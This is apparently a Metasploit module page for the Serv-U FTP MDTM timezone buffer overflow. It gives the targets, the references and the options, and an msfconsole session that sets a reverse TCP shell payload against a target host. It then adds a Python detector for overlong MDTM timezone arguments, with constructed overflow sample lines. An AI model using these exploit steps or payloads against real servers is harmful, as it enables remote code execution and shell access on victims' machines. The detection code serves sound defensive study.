Serv-U FTPD MDTM Overflow
This is an exploit for the Serv-U's MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, but only tested 1 version/os. The bug is in all versions prior to 5.0.0.4, but this exploit will not work against versions not listed above. You only get one shot, but it should be OS/SP independent. This exploit is a single hit, the service dies after the shellcode finishes execution.
Exploit Rank
- Good
Exploit Authors
- spoonm < spoonm [at] no$email.com >
Vulnerability References
- CVE-2004-0330
- OSVDB-4073
- http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html
- http://www.cnhonker.com/advisory/serv-u.mdtm.txt
- http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54
- BID-9751
Exploit Targets
- 0 - Serv-U Uber-Leet Universal ServUDaemon.exe (default)
- 1 - Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe
- 2 - Serv-U 5.0.0.0 ServUDaemon.exe
Similar Exploit Modules
- exploit/windows/ftp/32bitftp_list_reply
- exploit/windows/ftp/3cdaemon_ftp_user
- exploit/windows/ftp/aasync_list_reply
- exploit/windows/ftp/ability_server_stor
- exploit/windows/ftp/absolute_ftp_list_bof
- exploit/windows/ftp/cesarftp_mkd
- exploit/windows/ftp/dreamftp_format
- exploit/windows/ftp/easyfilesharing_pass
- exploit/windows/ftp/easyftp_cwd_fixret
- exploit/windows/ftp/easyftp_list_fixret
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/ftp/servu_mdtm
msf exploit(servu_mdtm) > show payloads
msf exploit(servu_mdtm) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(servu_mdtm) > set LHOST [MY IP ADDRESS]
msf exploit(servu_mdtm) > set RHOST [TARGET IP]
msf exploit(servu_mdtm) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| FTPPASS | The password for the specified username (default: mozilla@example.com) |
| FTPUSER | The username to authenticate as (default: anonymous) |
| RHOST | The target address |
| RPORT | The target port (default: 21) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| FTPDEBUG | Whether or not to print verbose debug statements |
| FTPTimeout | The number of seconds to wait for a reply from an FTP command |
| ForceDoubling | 1 to force \xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect |
| Proxies | Use a proxy chain |
| SEHOffset | Offset from beginning of timezone to SEH |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
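The description and the SEHOffset/ForceDoubling options above describe the bug from the attacker's side: an overlong timezone argument to MDTM overwrites the SEH record, and Serv-U 4.0.0.4 doubles every \xff byte before the data lands in the buffer, which shifts the offset. The following detection helper is an added example for this page, not code from the Metasploit module or from Serv-U. It parses raw FTP control-channel lines and flags MDTM commands whose timezone field is overlong or non-numeric. Assumptions not taken from the page: the request shape `MDTM YYYYMMDDHHMMSS+<timezone> <path>` (a 14-digit timestamp, then a sign, then the timezone up to the first space), a 4-character ceiling for a legitimate timezone, and that a doubled \xff (Telnet IAC escaping on the control connection) should be counted once so the measured length matches what the server sees after doubling is undone. The sample lines are constructed.

```python
"""Flag FTP MDTM commands with an oversized timezone argument.

Added example for this page; assumptions are stated in the lead-in and in
the comments below, and the sample lines are constructed, not captured.
"""
import re
from typing import Optional

# Assumption: a legitimate Serv-U timezone is at most +HHMM / -HHMM, i.e. 4
# characters after the sign.  Anything longer is treated as an overflow attempt.
MAX_TZ_LEN = 4

# Assumed MDTM shape: 14-digit timestamp, optional fraction, optional sign and
# timezone, then the path.  The timezone group is deliberately loose so that
# garbage (letters, high bytes) is captured and measured rather than rejected.
_MDTM_RE = re.compile(
    rb"^MDTM\s+(\d{14})(?:\.\d+)?(?:([+-])([^\s]*))?(?:\s+(.*))?$", re.I
)


def undouble_iac(data: bytes) -> bytes:
    """Collapse Telnet IAC escaping (0xff 0xff -> 0xff) so the length we
    measure is the length the server works with after undoubling."""
    return data.replace(b"\xff\xff", b"\xff")


def inspect_mdtm(line: bytes) -> Optional[dict]:
    """Parse one raw control-channel line; return a finding for MDTM, else None."""
    m = _MDTM_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    timestamp, _sign, tz, path = m.groups()
    tz = tz or b""
    undoubled = undouble_iac(tz)
    overlong = len(undoubled) > MAX_TZ_LEN
    non_numeric = bool(undoubled) and not undoubled.isdigit()
    return {
        "timestamp": timestamp.decode(),
        "tz_len": len(undoubled),            # length after IAC undoubling
        "iac_doubled": len(undoubled) != len(tz),
        "suspicious": overlong or non_numeric,
        "path": (path or b"").decode("latin-1"),
    }


def scan(lines) -> list:
    """Return the suspicious MDTM findings from an iterable of raw lines."""
    return [f for f in (inspect_mdtm(l) for l in lines) if f and f["suspicious"]]


# Constructed sample traffic: two benign MDTM requests, one plain overflow
# attempt, one overflow attempt whose filler contains doubled 0xff bytes, and
# an unrelated command.
SAMPLE_LINES = [
    b"MDTM 20031111111111 foo.txt\r\n",
    b"MDTM 20031111111111+0100 foo.txt\r\n",
    b"MDTM 20031111111111+" + b"A" * 120 + b" foo.txt\r\n",
    b"MDTM 20031111111111+" + b"\xff\xff" * 10 + b"A" * 100 + b" foo.txt\r\n",
    b"RETR foo.txt\r\n",
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(
            f"suspicious MDTM: tz_len={finding['tz_len']} "
            f"iac_doubled={finding['iac_doubled']} path={finding['path']!r}"
        )
```

The `tz_len` reported for the fourth sample is 110 rather than the 120 bytes on the wire, which is the point of `undouble_iac`: when comparing against a known SEH offset, the value that matters is the one after the server has collapsed the doubled bytes, which is also why the module exposes ForceDoubling separately for 4.0.0.4.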
